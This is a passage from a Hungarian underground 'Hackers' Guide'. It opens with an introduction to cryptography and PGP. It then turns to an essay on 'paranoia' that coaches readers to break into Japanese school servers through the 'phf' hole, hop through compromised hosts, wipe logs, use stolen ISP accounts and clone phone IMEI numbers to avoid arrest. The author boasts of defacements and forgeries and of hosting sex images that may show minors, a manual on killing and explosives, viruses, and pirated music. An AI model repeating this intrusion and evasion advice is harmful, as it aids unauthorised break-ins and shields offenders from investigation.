konvertálására.<br />

5. Titkosítás (cryptography) - az adatok rejtjelzésének / visszafejtésének tudománya.<br />

6. Titkosítás megfejtése (cryptanalysis) - a rejtjelezett adat feltörésének tudománya,<br />

különbözo eszközöket és technikákat használ.<br />

7. Támadó (attacker, cryptanalist) - a rejtjelzett adat feltöroje<br />

8. Kriptológia (cryptology) - a titkosítást és a megfejtését is magában foglaló<br />

tudomány.<br />

9. Cipher - rejtjelzo algoritmus, a rejtjelzés során használt matematikai függvény.<br />

A következo a logikai útja az egész folyamatnak:<br />

NYÍLT SZÖVEG --> REJTJELZÉS --> TITKOSÍTOTT SZÖVEG --> VISSZAFEJTÉS -<br />

-> NYÍLT SZÖVEG<br />

A titkosítás egy matematikai tudomány. Matematika használatával rejtjelzi /<br />

visszafejti az adatot a tároláshoz, vagy a hálózaton való továbbításhoz (pl. az<br />

interneten keresztül).<br />

A titkosítás fobb típusai<br />

A titkosítás fobb típusai a "gyenge" és az "eros". A titkosítás erossége attól függ,<br />

hogy mennyi idore és eroforrásba kerül, hogy visszakapd a nyílt szöveget. A jelen<br />

cikk írásának pillanatában a Földön létezo összes számítógép együtt nem volna<br />

képes feltörni egy eros kulcsot. De soha nem tudhatod - a holnap hozhat sokkal<br />

erosebb számítógépeket, vagy valaki találhat egy matematikai megoldást a<br />

visszafejtésre anélkül, hogy tudná a jelszót.<br />

Hogyan muködik a titkosítás?<br />

A cipher valamilyen kifejezést/szót/számokat (kulcs), és egyéb adatokat használ<br />

ahhoz, hogy rejtjelezze a nyílt szöveget. Különbözo kulcsok természetesen más<br />

rejtjelezett szöveget adnak végeredményül. A rejtjelezett adat erossége két dologtól<br />

függ: a cipher erosségétol és a kulcs erosségétol. Éppen ezért a kulcsot megfeleloen<br />

kell megválasztani és tárolni (ha lehet, akkor meg kell jegyezni :) Mindezek a dolgok<br />

együttesen adják a titkosítási rendszert (cryptosystem).<br />

Hagyományos titkosítás<br />

A rejtjelezo algoritmus itt egyetlen kulcsot használ a rejtjelezéshez és a<br />

visszafejtéshez. Erre egy példa a DES (Data Encryption Standard), amelyet széles<br />

körben használnak a Szövetségi Kormányzásban (USA - Federal Government). A<br />

hagyományos titkosításnak elonyei és hátrányai is vannak. Eloször is - nagyon<br />

gyors, és olyan adatok rejtjelezésére kiváló, amelyet senki más nem fog használni a<br />

tulajdonosán kívül. Emiatt - a kulcs biztonságos átadása nagyon nehéz manapság:<br />

mielott más is el tudná olvasni az adatot, elotte át kell neki adnod a kulcsot, ami nem<br />

68


Hackers’ Guide<br />

praktikus, mert nem bízhatsz meg a telefontársaságokban, postában, az e-mailben<br />

és egyéb internetes szolgáltatásokban. Felmerül a kérdés: hogyan juttatod el a<br />

kulcsot a címzetthez, anélkül, hogy más is hozzájuthasson? A válasz erre ma a:<br />

Nyilvános kulcsú titkosítás (áttekintés)<br />

Ez megoldja a kulcscsere problémáját. Whitefield Diffie és Martin Helman vezette be<br />

a nyilvános kulcsú titkosítás módszerét 1975-ben. Pletykák szólnak arról, hogy a Brit<br />

Titkosszolgálat is feltalálta néhány évvel azelott, de titokban tartották és nem<br />

csináltak vele semmit.<br />

A nyilvános kulcsú titkosítás aszimmetrikus rendszer, és két kulcsot használ<br />

(kulcspár): egy nyilvános kulcsot (public key), amelyet a rejtjelezésnél használnak, és<br />

egy titkos kulcsot (private key), a visszafejtéshez. A nyilvános kulcsot világszerte<br />

közzéteszik, de a titkos kulcsot titokban tartják. Bárki és bármi rejtjelezhet a te titkos<br />

kulcsoddal, de csak te (vagyis pontosabban az a személy, aki birtokában van a titkos<br />

kulcsnak) tudja visszafejteni a rejtjelezett szöveget.<br />

Most visszatérünk a PGP-hez<br />

A legnépszerubb titkosítási rendszerek egyike a PGP (Pretty Good Privacy). Ahogy<br />

fentebb már szó volt róla, a PGP hibrid titkosítási rendszer - tehát kombinálja a<br />

hagyományos és a nyilvános kulcsú titkosítást. A PGP a következo módon muködik:<br />

A) Rejtjelezés:<br />

1) Eloször a PGP tömöríti a nyílt szöveget. Ez több okból hasznos: kevesebb helyre<br />

lesz szükség a lemezen, a kisebb üzenet kevesebb idot jelent (az ido pedig pénz),<br />

amikor az interneten keresztül küldöd; továbbá növeli a titkosítás erosségét, mert a<br />

tömörített adatban kevesebb minta van, mint a nyílt szövegben, és a mintákat<br />

gyakran alkalmazzák a támadók, hogy megtörjék a rejtjelet... (pl. elemzik, hogy<br />

melyik betu fordul elo legtöbbször, és feltételezik, hogy az a "t" betu, stb. -Voyager2)<br />

2)a PGP azután generál egy egyszer használatos titkos kulcsot, amelyet néha<br />

session-kulcsnak is neveznek. Ez egy véletlenszám, véletlen adatokból eloállítva,<br />

amelyek az egered mozgatásából és a billentyuleütésekbol származnak, valamint a<br />

CPU zajából. Egy nagyon gyors és eros hagyományos titkosítási algoritmussal<br />

elkódolja a nyílt szöveget, és eloállítja a rejtjelezett szöveget.<br />

3) Az adat titkosítása után a session-kulcsot rejtjelezi a címzett nyilvános kulcsával<br />

(akinek az üzenetet küldjük), és azután ezt a rejtjelezett session-kulcsot és a<br />

rejtjelezett szöveget elküldi a címzettnek.<br />

B) Visszafejtés:<br />

1) A címzett ugye megkapta az üzenetet, és a titkos kulcsával visszafejti a sessionkulcsot.<br />

2) A session-kulcsot használva visszafejti a hagyományosan titkosított rejtjelezett<br />

szöveget.<br />

3) Megszünteti a tömörítést.<br />

A hagyományos és nyilvános kulcsú titkosítás kombinálása nagyon gyors és eros<br />

titkosítási rendszert eredményez. Ez a hagyományos titkosítás gyorsasága és a<br />

nyilvános kulcs biztonsága miatt van.<br />

Néhány szó a kulcsokról...<br />

69


Hackers’ Guide<br />

A kulcs egy szám, amelyet a rejtjelezo algoritmus a rejtjelszöveg eloállításához<br />

használ. Ezek valójában óriási számok. A kulcs méretét bitekben jelzik, minél<br />

nagyobb a kulcs, annál titkosabb a rejtjelszöveg. A hagyományos és a nyilvános<br />

kulcsok méretének összehasonlítása érdekes - a hagyományos 128-bites kulcs<br />

ugyanolyan erosségu, mint egy 3000 bites nyilvános kulcs. De nem hasonlíthatod<br />

össze ezeket a típusokat, mert más-más algoritmusban használatosak (nem<br />

ugyanaz, hogy Bakonyban a tanya, vagy takonyban a banya, igaz-e?)<br />

A legmagasabb szintu biztonság eléréséhez mindig a legnagyobb méretu kulcsot<br />

válaszd, mert elég idot és eroforrást feltételezve a titkos kulcs megfejtheto.<br />

A kulcsokat titkosított formában tárolja a PGP. Általában két "keyring"-et használ<br />

(ezek fájlok a lemezen) - az egyiket a nyilvános kulcsoknak, a másikat a titkosnak.<br />

Ne veszítsd el a titkos keyringet, mert minden adat, amely ezekhez a kulcsokhoz lett<br />

titkosítva, soha többé nem kerülhet visszafejtésre.<br />

.. és a digitális aláírásokról<br />

Ahogy a kézzel írt aláírások is, a digitális aláírás azonosítja az információ eredetét.<br />

Gyakran ez a tulajdonsága a titkosításnak gyakrabban használatos, mint a<br />

rejtjelezés. A digitális aláírást "lehetetlen" hamisítani. Röviden - amikor digitális<br />

aláírással van dolgod, biztos lehetsz benne, hogy a megfelelo ember írta alá az<br />

adatot.<br />

A digitális aláírás a következoképpen muködik:<br />

1) A nyílt szöveget titkosítják a TITKOS kulcsoddal.<br />

2) Ha rejtjelezett szöveg visszafejtheto a NYILVÁNOS kulcsoddal, akkor az adat<br />

toled származik.<br />

Ez az eljárás lassú és nagy mennyiségu adatot állít elo, amely nem szükséges az<br />

aláírás ellenorzéséhez. Ezért találták ki a Hash függvényeket. Ezek növelik az<br />

aláírás hatékonyságát. A hash függvény egy akármilyen bemeneti szövegbol eloállít<br />

egy fix hosszúságú kimeneti szöveget (kivonat - digest). A matematikai oldalról<br />

nézve a függvényt, a bemeneti szövegben történo akár csak egy kis apró változás<br />

teljesen más kivonatot fog eredményezni. Na és ezt a kivonatot titkosítják a titkos<br />

kulcsoddal (ez az aláírás), és elküldik a nyílt szöveggel együtt a feladónak. A hash<br />

függvény biztosítja, hogy senki nem hamisíthatja sem a szöveget, sem az aláírást,<br />

mert ebben az esetben az aláírás megbukik az ellenorzésnél.<br />

A digitális aláírás a fo útja annak, hogy egy nyilvános kulcs érvényességét<br />

leellenorizzük.<br />

Digitális tanúsítványok (Digital certificates)<br />

Természetesen amikor a nyilvános kulcsú titkosítást használod, akkor biztos akarsz<br />

lenni abban, hogy a megfelelo ember kulcsával rejtjelezel. Itt jön a bizonyosság<br />

problémája. Tegyük fel, hogy valaki egy hamis kulcsot küld neked egy másik ember<br />

nevében, akinek írni akarsz. Amikor rejtjelezed az adatot és elküldöd a "címzettnek",<br />

az adat a rossz embernek fog menni. A nyilvános kulcsú környezetben nagyon<br />

fontos, hogy tudd, hogy a megfelelo nyilvános kulcsot használod a megfelelo<br />

címzetthez. Ennek egyik útja, hogy csak azokhoz a kulcsokhoz rejtjelezel, amelyeket<br />

személyesen adtak neked (pl. floppy lemezen). De ez kényelmetlen - eloször is<br />

elofordul, hogy nem is ismered a címzettet, másodszor hogyan küldesz adatot<br />

70


Hackers’ Guide<br />

olyasvalakinek, aki éppen nem elérheto fizikailag (egy repülogépen ül, vagy akármi) -<br />

postagalambot küldesz egy üzenettel?<br />

A digitális tanúsítvány egyszerusíti ezt a folyamatot azáltal, hogy megkeresi a<br />

megfelelo kulcsot. A tanúsítvány olyan adat, amely hasonló módon értelmezheto,<br />

mint a hagyományos tanúsítványok. Ez az információt a nyilvános kulccsal együtt<br />

segítséget nyújt a kulcs érvényességének leellenorzésében. A tanúsítvány<br />

megakadályozza, hogy valaki kicserélje más nyilvános kulcsát valami más kulcsra.<br />

A digitális tanúsítvány a következokbol áll:<br />

1) A nyilvános kulcs<br />

2) tanúsítvány-információ (némi info a felhasználóról, név, ID, stb)<br />

3) legalább egy digitális aláírás (egy harmadik fél által, akiben megbízol).<br />

A digitális aláírás egy tanúsítványon azt jelzi, hogy a harmadik fél elfogadta a<br />

tanúsítvány-információt. A digitális aláírás nem jelenti a teljes tanúsítvány<br />

érvényességét; csupán azt jelzi, hogy az aláírt információ az adott nyilvános kulccsal<br />

összetartozik. Röviden - a tanúsítvány egy nyilvános kulcs néhány személyes<br />

információval digitálisan aláírva, és egy harmadik fél által hitelesítve. A legnagyobb<br />

elony, amelyet a digitális tanúsítvány használatával nyersz, hogy mikor kicseréled a<br />

nyilvános kulcsodat valaki mással, nem kell fizikailag jelen lenned. A fizikai<br />

kulcscserének vannak elonyei, de csak egy bizonyos pontig.<br />

Vannak rendszerek, amelyek sok tanúsítványt tárolnak összegyujtve, hogy bárki<br />

ellenorizhesse egy adott kulcs érvényességét. Ezeket hívják tanúsítványszervernek<br />

(Certificate Servers/Systems). Egy tanúsítványszerver nem más, mint egy adatbázis,<br />

amely lehetové teszi felhasználóknak, hogy tanúsítványokat hozzanak létre és<br />

töltsenek le.<br />

Tanúsítvány-formátumok<br />

Egy digitális tanúsítvány sokféle személyes információt tárol a felhasználóról, a<br />

nyilvános kulccsal együtt, és valaki által aláírva, akiben megbízol. A PGP-re<br />

visszatérve, két tanúsítvány-formátumot támogat:<br />

1) PGP tanúsítványok<br />

2) X.509 tanúsítványok.<br />

Egy PGP tanúsítvány az alábbi dolgokból áll:<br />

1) A PGP verziószáma, amellyel az adott kulcs készült.<br />

2) A tanúsító nyilvános kulcsa a kulcshoz tartozó algoritmussal együtt, amely RSA,<br />

DH és DSA lehet.<br />

3) A tanúsítvány érvényességi ideje, ez jelzi, hogy meddig érvényes az egész.<br />

4) A kulcshoz tartozó hagyományos titkosító algoritmus neve. Ez mutatja, hogy a<br />

tanúsítvány tulajdonosa milyen módon preferálja a neki küldött adatok titkosítását.<br />

Ezek lehetnek: CAST, IDEA vagy Triple-DES (3DES néven is emlegetik).<br />

Érvényesség és bizalom<br />

Az érvényesség bizalom valamiben, hogy az tényleg a tulajdonosához tartozik.<br />

Például a nyilvános kulcs, vagy a tanúsítvány. A bizalom nagyon fontos a nyilvános<br />

kulcsú rendszerekben, ahol tudnod kell, hogy egy tanúsítvány érvényes-e vagy nem.<br />

71


Hackers’ Guide<br />

Amikor biztos vagy benne, hogy egy tanúsítvány a megfelelo személyhez tartozik,<br />

akkor megjelölheted a kulcsát a keyringeden, ezzel jelzed magadnak, hogy<br />

ellenorizted a tanúsítványt és érvényes. Ha elküldöd az aláírást egy tanúsítványszervernek,<br />

akkor mások tudni fogják, hogy te tanúsítottad az érvényességét. Ahhoz,<br />

hogy higgy valakinek, aki tanúsította valamely tanúsítvány érvényességét - bíznod<br />

kell benne.<br />

Az érvényességet úgy is leellenorizheted, hogy találkozol a címzettel és fizikailag<br />

átveszed tole a kulcsot. A másik módja ennek az "ujjlenyomatok" (fingerprints)<br />

használata. Egy PGP ujjlenyomat egy tanúsítványból keletkezik egy hash függvény<br />

segítségével. Minden ujjlenyomat egyedi. Általában hexadecimális formában, vagy<br />

néhány szó formájában jelenik meg. Amikor van ujjlenyomatod az adott<br />

tanúsítványról, és ismered a címzett hangját, felhívhatod, hogy olvassa fel az övét -<br />

ha egyeznek, akkor o a kulcs birtokosa. De sokszor nem ismered a hangját - ekkor<br />

egy harmadik félhez kell fordulnod (egy tanúsítvány-szerverhez).<br />

De ne feledd, hogy - hacsak a kulcs tulajdonosa nem adta át neked fizikailag - egy<br />

harmadik félben kell bíznod.<br />

Jelszavak és jelkifejezések (passphrases)<br />

Majdnem minden nap, amikor számítógépeket használsz, be kell írnod egy titkos<br />

karakterkombinációt, egy jelszót, hogy hozzáférhess valamilyen információhoz. Ezek<br />

tehát ismerosek. Ha nem - hoppá, akkor rossz cikket olvasol :)<br />

Egy jelkifejezés a jelszónak egy hosszabb formája, sokkal biztonságosabb ilyet<br />

használni. A jelkifejezés segít, hogy nagyobb biztonságban legyen az adat olyan<br />

támadásokkal szemben, amelyek szótári szavakat használnak. A legjobb<br />

jelkifejezések hosszúak és bonyolultak, és mindenféle karaktert tartalmaznak. A PGP<br />

jelkifejezést használ a titkos kulcsod rejtjelezésére a titkos keyringen. Ezt a<br />

jelkifejezés-bol vett hash segítségével teszi. A titkos kulcsod használatához ismerned<br />

kell a jelkifejezést. A jelkifejezésnek olyannak kell lennie, hogy ne felejtsd el, de<br />

mások nehezen találhassák ki. Valami olyasmit válassz, amely a hosszú-távú<br />

memóriádban már berögzült, inkább ne találj ki valami teljesen új dolgot. Ha<br />

elfelejted a jelkifejezést, a titkos kulcsod teljesen használhatatlanná válik és az ehhez<br />

tartozó nyilvános kulccsal rejtjelezett adatokat sem tudod majd visszafejteni.<br />

************************************************************************************************<br />

A paranoiáról<br />

Pár napja még nem gondoltam volna, hogy azt fogom írni, amit itt most írni készülök.<br />

És aztán egyik napról a másikra BUMM, bejöttek a dolgok, szépen sorra, és most<br />

meg a laza naív gyerekből paranoiddá váltam. Igaz, már egy ideje feladtam a<br />

hackelést a nagyvilágban, csak akkor ugrok neki valaminek, ha a saját<br />

72


Hackers’ Guide<br />

szempontomból fontos, de mégis, tudtára kell adnom minden hozzám hasonló<br />

gondolkodásúnak, hogy változtak a dolgok. Mielőtt még elálmosodnál, elmondom,<br />

hogy nem csak pofázni fogok oldalakon keresztül, adok ötleteket, segédprogramokat.<br />

Tudjátok, egy éve egy skót haverom letiltották a szolgáltatójánál, csak mert letöltött<br />

egy file-t a netről, ami hackeléssel kapcsolatos. Kiröhögtem, hogy hogy lehet ilyen<br />

körülmények között internetezni, hogy minden egyes fingását nézik az embernek.<br />

Most kiderült, hogy magyarország sürgős ütemben halad a "nyugati" irányba. Az<br />

amerikaiaknál teljes paranoia van, amit én régen nem érthettem meg, de egyre<br />

jobban kezdem komolyan venni. Néhány hír a közelmúltból...<br />

A napok eseményei<br />

Ez egy kisebb eset: a gyerek velem együtt felnyomott egy japán szervert az<br />

iskolájából. Nem is titkolom, az eötvös józsef gimiben történt az eset. Nem sok idő<br />

múlva a gyerek ki lett tiltva, mert a japánok írtak a suliba, hogy a suli IP címéről<br />

nyomultak be.<br />

Elkobozták számítógépét, és kártérítést fizettettek meg egy budapesti fiatallal, aki<br />

egy matávnet felhasználó hozzáférését használta az internetezésre. Amikor az<br />

előfizető reklamált, a matávnet belenézett egy-két logfile-ba, és kapásból<br />

megmondták a telefonszámát, a csalót a rendőrség kézrekerítette.<br />

Egy politikust, volt polgármestert letartóztattak. Állítólag illegális (/pedofil?)<br />

képeket terjesztett a neten. Akárhogy is volt, az elender kiadta felhasználóját. Nem<br />

csak hogy a felhasználónevet nyomozták ki, megmondták a pontos telefonszámot,<br />

ahonnan a netet hívták a bizonyos időkben, amikor a képek terjesztése történt.<br />

Kinyomozták az OTP nyugta hamisító kilétét. Valaki beszkennelt egy OTP<br />

bizonylatot, profin átírta, mintha a nyugta 2000-ben 1990-et írt volna ki dátumként, a<br />

képet felrakta a netre, ezzel rossz helyzetbe hozta a bankot, mintha nem készült<br />

volna fel megfelelőképpen a dátumváltásra. Megint, a személy kilétét kinyomozták,<br />

aki azóta elnézést kért a banktól, állítása szerint "nem mérte fel cselekménye"<br />

következményeit.<br />

Barátom az elender meghackelést követően kapásból felrakta az extrára<br />

"elendersux" azonosítóval a meghackelt elender lapot. Azt, amit mindenkinek joga<br />

van látni. A hozzáféréseket úgyis már letiltották. De mégis, fél nap se telt bele, és az<br />

extra letörölte, az elender kérésére. Nem le kell törölni más lapját, hanem meg kell<br />

védeni a saját rendszert, úgy, hogy nem windows-buzi "szakemberekkel" készítteted<br />

el a rendszered. A rendőrség, és úgy általában mindenki véres hadjáratot indított a<br />

"hackerek" ellen.<br />

Konklúzió<br />

Most rájöttem, nem azért nem buktam idáig le semmivel, mert nem tudták<br />

lenyomozni, meg nem érdekelte a szolgáltatót. Senki sem jelentett fel. Én is lopott<br />

matávnetes accot használok, mint még rajtam kívül legalább ezer ember, nem<br />

ismerem a statisztikát. Csináltam már hasonló hamisítványokat, mint az OTP-s<br />

ügyben. Az XXX szexképek-részben sem biztos, hogy mindegyik, a képen szereplő<br />

lány betöltötte 18. életévét. Fogalmam sincs, mivel nekem is csak küldték őket, én<br />

meg a látogatottságért felraktam őket. A hacklife-ban is vannak illegális dolgok<br />

bőven. A novell - hackelés sem hiszem, hogy nagyon törvényszerű lenne. Na és a<br />

"beszólások" részben, hogy nem cenzoráltam az emberek beszólásait? Meg a<br />

vírusok, amelyekhez a lapomon mindenki hozzáférhet? És akkor még nem<br />

beszéltem az Anarchista "főzőcskekönyv"-ről, ami a Textek részben van, minden le<br />

van benne írva, hogy kell valakit megölni, puskaport készíteni, vagy macskabombát.<br />

73


Hackers’ Guide<br />

Tovább fokozom: MP3. Többet nem is kell mondanom. Ez már teljesen illegális<br />

dolog. Megfosztom szegény zeneszerzőket attól, hogy 10-szer jobban éljenek egy<br />

átlagembernél, csak 9-szer élnek jobban, mert csomó ember a netről leszedi a<br />

számukat. Persze hogyha én nem lennék, akkor mindenki megvenné a K*RVA drága<br />

CD-t, de mivel én ide felrakom a számokat MP3-ban, ezért a látogatóim nem veszik<br />

meg a szerző termékét, amiből úgyse az énekes, hanem a kiadó gazdagodik meg.<br />

És most meg töröljek le mindent? Akkor végre nem éheznének az énekesek? Na<br />

jólvan! Mégis, tudom, hogy egyszercsak egy extrásnak, vagy egy matávnetesnek,<br />

vagy egy fakabátnak fel fog tűnni a lapom, vagy hogy nem csak a saját<br />

hozzáférésem használom, és akkor vagy lebukok kicsit, vagy lebukom nagyon...<br />

jönnek hozzám is elkobozni mindent. Aztán max. 1 leszek a sok hír közül. És<br />

ugyanez most már megtörténhet bárkivel. Ha hekkerkedésre adod a fejed akkor<br />

számíts arra, hogy bármikor egy papírkosárba hullhat. Most ennek az elkerülésére<br />

nyújtanék egy-két ötletet, illetve programot.<br />

Útvonal<br />

Bárhova telnetelsz, webelsz, bármi rád nézve terhelőt csinálsz, használj néhány<br />

közbeiktatott szervert. Azt, hogy részletesen hogy kell ezt csinálni, itt nem tudom<br />

leírni, az hosszú, és részletes. Kiindulásnak ajánlom pl. a webprovider-t, egy<br />

független ingyenes szolgáltatót, ahol saját domaint kapsz, és telnet lehetőséged is<br />

van. De persze ez magában nem elég, kell keresni a hálón kisebb japán szervereket,<br />

pl. iskolai szervereket, ezekbe nagyon könnyű bejutni, már milliószor csináltam, nem<br />

kell hozzá extra ész, 10%-on működik legalább a phf-lyuk, akármikor kinyomtathatsz<br />

egy japán suliban egy levelet az ottani nyomtatóra :) De mégjobb ha mondjuk van<br />

ismerettséged egy suliban, és ott helyileg behackelődsz, így telnetet meg egyebeket<br />

teremtve magadnak. Ez nem is nehéz dolog. Aztán ha már van 1-2 védelmed, akkor<br />

ha épp betelnetelni készülsz a célponthoz, menj keresztül ezeken a szervereken<br />

egy-párszor, és amikor csak lehet, tűntesd el a logfile-okból magad, ha van rá<br />

lehetőséged. Tudom, hogy ez kibaszottul kurvára sok munka, de ha valami tényleg<br />

nagyra készülsz, akkor nem lenne jó lebukni, nem? Vagy ha ezek a módszerek nem<br />

mennek még nagyon, akkor az is jó, ha az alapvető lebukási lehetőséget kiiktatod,<br />

mert csak úgy juthatnak el hozzád, ha a saját net hozzáférésed használod, vagy a<br />

saját telefonszámod. Tulajdonképpen ha mindkettőt ki tudod iktatni, akkor már nem is<br />

kell varázsolnod logfileokkal meg egyebekkel.<br />

Végső akció kivitelezés<br />

Folytassuk csak onnan, ahol abbahagytuk! Tehát valami nagyra készülsz... már<br />

tudod, hogy mit hogy, satöbbi.... tegyük fel, hogy már meg is szereztél egy jelszót, és<br />

fel akarsz tölteni egy új lapot a célpontra. Nézzük csak, milyen célpontjaid lehetnek:<br />

Saját suli: ehhez nem kell varázsolgatni, csak töltsd fel, nem fog a sulid a<br />

szolgáltatóhoz menni, hogy elkérje a usernevet, meg a telefonszámot. De utána<br />

kussolj, nem kell reklámozni, hogy te voltál<br />

Vállalati, céges lapok: Én vigyáznék a helyedben...<br />

Közismert, nagy látogatottságú lapok: 100% PARANOIÁVAL, lásd később...<br />

.MIL, .GOV, és társaik: Felejtsd el, ne legyél hülye. Ne kezdjél el baszakodni velük.<br />

Ha nagyon akarod, akkor 100% PARANOIÁVAL (lejjebb írok róla...), bármit is<br />

74


csinálsz.<br />

100% PARANOIA<br />

Nézzük csak, milyen nyomok vannak, ami alapján téged, mint személyt<br />

beazonosíthatnak!<br />

Egyrészt, kezdjük ott, hogy ha valami vindózos fosod van, mint nekem, akkor<br />

felkapcsolódásnál kb. 4-5 adatot közöl a dialup a szerverrel..... múltkor egy<br />

számítógépet közbeiktattam fizikailag a modem és a gépem közé. Loggoltam<br />

MINDENT ami a modem és a szerver között ment. Valami ilyesmi jött ki:<br />

AT<br />

ATE0V1<br />

ATX4<br />

ATDT0651201201<br />

~blablablablablg mindenféle szarság<br />

usernév/jelszó, blablablablablablablabla mindenféle szarság<br />

blablablablaMAD MIND, blabla, DIGITAL NEXUS, blabla, MAD MIND<br />

blablabla, MACRI, bla blablablablablablablablablablabla<br />

MAD, blablablablablablablablabla<br />

Hackers’ Guide<br />

Ugye milyen kellemes? Tudtál erről? És tudsz még a 20 másik dologról, ami alapján<br />

a GÉPED beazonosíthatják? Mert hiába csinálsz mindent más vonalról, más<br />

usernévvel, ha ezt a fajta infót is loggolják, akkor tudják, hogy ugyanaz a gép, amivel<br />

valaha már felmentél a netre, mondjuk a saját loginoddal, a saját telefonszámodon,<br />

vagy írtál egy emailt, amiből kiderült, hogy ki voltál. Visszakereshető, rizikós. Épp<br />

ezért kell átnézni a REGISTRY-t (windowsban...), hogy milyen infó van, amit nem<br />

szeretnél, hogy lássanak, mint az én példámban, ahol 2-szer benne volt, hogy "MAD<br />

MIND", a nickem, egyszer, hogy "MAD" mint vezetéknév, "MACRI", mint a windows<br />

usernevem (ezt mi a FASZNAK kell tudniuk?!), és a "Digital Nexus", mint vállalatnév,<br />

ez esetben egy régi hacker csapat, aminek tagja voltam. Ugye kellemetlen? Erre<br />

megoldás, hogy dialin accot szerzel egy iskolában (lehetőleg nem a sajátodban), és<br />

ott talán nem loggolnak ennyi infót. Következő állomás (természetesen most a lehető<br />

legparanoidabb, de azért még reális védekezésről beszélek egy nagyobb méretű<br />

akció előtt, nem azt mondom, hogy mindig így kell :))): Veszel egy pannon<br />

praktikumot, vagy egy westel dominót. Még jobb, ha ericssonod van, azzal állítólag<br />

könnyű átírni a kártya IMEI számát, így azonosítatlanul telefonálhatsz, és még<br />

ingyen is. Ha megvan, egyszerűen felcsatlakozol a megtervezett módon a netre, és<br />

nekilátsz. így már fasz se fog kinyomozni, remélhetőleg. Persze nem kell azt se<br />

hinni, hogy ott a rendőrségnél meg általában mindenhatóak a "szakemberek". Ha<br />

eléggé óvatos vagy, nem fognak megtalálni.<br />

HÉTKÖZNAPI PARANOIA<br />

Amikor épp csak beszélgetünk, tervezünk valamit, akkor sem árt vigyáznunk a<br />

levelezéssel. Tudod te, hány szerveren keresztül megy egy email amit elküldesz?<br />

Tudod hány helyen tudják azt leszedni? A válasz három betű: SOK. Túl sok ahhoz,<br />

hogy te bármiféle illegalitást emailben megbeszélhess nyugodtan. Van mindenféle<br />

titkosítóprogram, de akkor már rég rossz, ha titkosított file-okat küldözgetsz a<br />

címzettnek. E-Mailezésre ajánlok egy programot, amit a skót haverommal<br />

használtunk jó hosszú ideig. Láttad a "The Saint" c. filmet? A magyar címe meglepő<br />

módon "Az angyal" volt. Onnan merítettem az ötletet. Jön egy email, amiben a feladó<br />

az időről kérdez, leír egy karfiolos besameles receptet, és üdvözli a testvéreidet.<br />

75


Hackers’ Guide<br />

Ekkor te ráuszítod a programot, ami kiszed belőle néhány betűt, összerakja őket, és<br />

ott is van a szöveg: "HOLNAP 6-KOR FELBASSZUK A MATÁVNETET". Egész jó<br />

ötlet, nem? És az a vicces benne, hogy senki se tudhatja, hogy a levélben már szinte<br />

SZÓ SZERINT a sorok között van a tartalom. A program neve "HÁLÓ", mivel úgy<br />

működik, mint egy háló. Akivel levelezni akarsz ilyen módon, annak floppyn odaadod<br />

a "HÁLÓ"-mintát, amin a lyukak helyei vannak, és már mehet is a levelezés. Bővebb<br />

információt a programot kitömörítve találhatsz. Itt a link: HALO.ZIP. Eléggé kicsi a<br />

progam ahhoz képest, hogy mennyire hasznos, igaz, DOS-ra írtam, de attól még<br />

tökéletesen lehet használni.<br />

ADATTÁROLÁS<br />

Naja... adattárolás. Ha olyasmit csinálsz (márpedig ha ezt olvasod, akkor foglalkozol<br />

vele), ami nem totálisan legális, egyáltalán ne lepődj meg, ha egy nap jön pár<br />

civilruhás ember, néhány egyenruhás kíséretében, és "lefoglalnak", "elkoboznak",<br />

"kutatnak". Mindegyik lényege ugyanaz.... Felkapják a gépet, és viszik. Épp ezért,<br />

bármi olyat tárolsz a gépeden, ami neked fontos, de "lefoglalási" szempontból<br />

kellemetlen lenne, azt titkosítsd, ideiglenesen. Erre a feladatra van már egymillió<br />

program, de az az igazság, hogy sohasem tudhatod, hogy melyik az, amelyik tényleg<br />

eléggé erős védelemmel van ellátva. Én megoldottam ezt a problémát: írtam egy<br />

saját titkosító programot. Olyan matematikai algoritmusokat tettem bele, amelyeknek<br />

a tulajdonságaival én sem vagyok teljesen tisztában. Háromféle, dokumentálatlan<br />

titkosítási módszert használok benne. Szép felülete van, és ez az egyetlen program,<br />

amiről biztos vagyok, hogy 100%-os védettségben tartja azt, amit titkosítok vele.<br />

Nem nagy file-okra terveztem, mert eléggé lassú archiválásra, de egy-két tömörített<br />

file-t lazán lehet vele titkosítani, és ha biztosan tudják, hogy egy négybetűs jelszavat<br />

választottál magadnak, akkor is kb. 100 év, amíg megfejtik. Szóval ez az amit én<br />

védelemnek nevezek. És annyira rohadtul biztos, hogy még a forrását is kiadom.<br />

Szép pascal program. Tehát, itt lehet leszedni: SICRIT.ZIP, program, forrás, és<br />

dokumentáció egyben. Tehát ha már megvan, hogy mivel titkosítasz ideiglenesen<br />

fileokat, akkor mondok egy tuti tippet a biztonságra: rendszeresen MENTSÉL, és<br />

TÖRÖLJ! Ugye, nem is bonyolult? Nem árt, ha van CD íród, sőt, nagyon jó. Ha<br />

mindened megvan CD-n, akkor lefekvés előtt már törölhetsz is esténként. Most<br />

hülyének nézel biztos, de ha lesz belőled valami, azonkívül, hogy lószar, tetű, vagy<br />

lábtörlő, akkor potenciális esélyed van arra, hogy egyszercsak kijöjjenek hozzád.<br />

Gondolj csak bele a példák alapján: gondolta volna a gyerek aki kapott a haverjától<br />

matávnetes accot, hogy kijönnek hozzá? Gondolta volna a lamer, aki back orifice-el<br />

etetett be embereket, és úgy szerzett hozzáféréseket? Sőt, a legjobb - gondolta<br />

volna a srác aki átírta a 2000-et a bizonylaton 1990-re paintbrushban, és CSAK<br />

FELRAKOTT EGY JPG-t A NETRE ami egy hamisított, poénból beszkennelt otp<br />

bizonylat volt, hogy kijönnek, és elkobozzák a gépét? Vagy az élet & irodalom<br />

szerkesztője, aki - igaz, nem hekkeléssel, de mégis - publikált titkos, vagy talán nem<br />

is létező adatokat, hogy felforgatják a lakását? Egyre gyakrabbak ezek az esetek, és<br />

sohasem tudni, ki lesz a következő nevetséges áldozat. Én talán már be vagyok<br />

biztosítva. És te?<br />

************************************************************************************************<br />

76


Hack Windows alól és tudnivalók<br />

Hackers’ Guide<br />

Elorebocsatjuk, hogy ezen anyag teljes mertekben a mi muvunk, nem forditas (egyes<br />

reszek kivetelevel, ahol ezt jelezzuk), es nem masolas. Egyetlen resze sem atvett<br />

anyag. Szabadon terjesztheto, formazhato DE: tartalmi valtoztatas nelkul, a nevunk<br />

lathato kiirasaval. (Lehetoleg nem fekete alapon feketevel, es nem ket pontos<br />

betumerettel :) Bocs hogy egyszer egyes szamban maskor tobbesben beszelunk<br />

magunkrol, de az anyag munkamegosztasban keszult.<br />

A szakerto es sok eve a szakmaban tevekenykedo hackerek valoszinuleg nem sokra<br />

